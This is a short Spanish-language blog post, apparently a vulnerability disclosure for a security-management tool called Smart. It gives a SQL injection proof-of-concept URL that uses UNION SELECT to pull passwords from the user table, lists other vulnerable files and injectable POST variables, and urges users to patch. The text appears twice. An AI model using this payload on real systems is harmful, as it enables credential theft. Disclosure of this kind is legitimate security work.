Smart es un software que ayuda a hacerle el seguimiento a los procesos de gestión relacionados con seguridad informática.
Mirando el código encontre varias cosas, solo pongo un ejemplo para que ustedes mismos investiguen un poco mas.
El bug es un tipico SQL injection, tambien hay otros bugs sencillos como XSS y errores en los scripts que me indican donde estan instalados.
Un ejemplo de SQL injection (PoC):
En el archivo: downloadlibraryfile.php
Ejemplo:
http://smarthost/downloadlibraryfile.php?fileId='2' AND 0
UNION SELECT password,password,password,password FROM user
Otros archivos posiblemente vulnerables:
* firewallrequest.php
* firewallrequestprocessing.php
puedo inyectar variables en
$srcIP=$_POST['srcIP'];
$dstIP=$_POST['dstIP'];
$srcNAT=$_POST['srcNAT'];
$dstNAT=$_POST['dstNAT'];
$port=$_POST['port'];
$protocol=$_POST['protocol'];
$justification=$_POST['justification'];
$firstname=$_POST['firstname'];
Como siempre, si estas usando esta versión entonces parcha el software.
Saludos.
Mirando el código encontre varias cosas, solo pongo un ejemplo para que ustedes mismos investiguen un poco mas.
El bug es un tipico SQL injection, tambien hay otros bugs sencillos como XSS y errores en los scripts que me indican donde estan instalados.
Un ejemplo de SQL injection (PoC):
En el archivo: downloadlibraryfile.php
Ejemplo:
http://smarthost/downloadlibraryfile.php?fileId='2' AND 0
UNION SELECT password,password,password,password FROM user
Otros archivos posiblemente vulnerables:* firewallrequest.php
* firewallrequestprocessing.php
puedo inyectar variables en
$srcIP=$_POST['srcIP'];
$dstIP=$_POST['dstIP'];
$srcNAT=$_POST['srcNAT'];
$dstNAT=$_POST['dstNAT'];
$port=$_POST['port'];
$protocol=$_POST['protocol'];
$justification=$_POST['justification'];
$firstname=$_POST['firstname'];
Como siempre, si estas usando esta versión entonces parcha el software.
Saludos.
No hay comentarios:
Publicar un comentario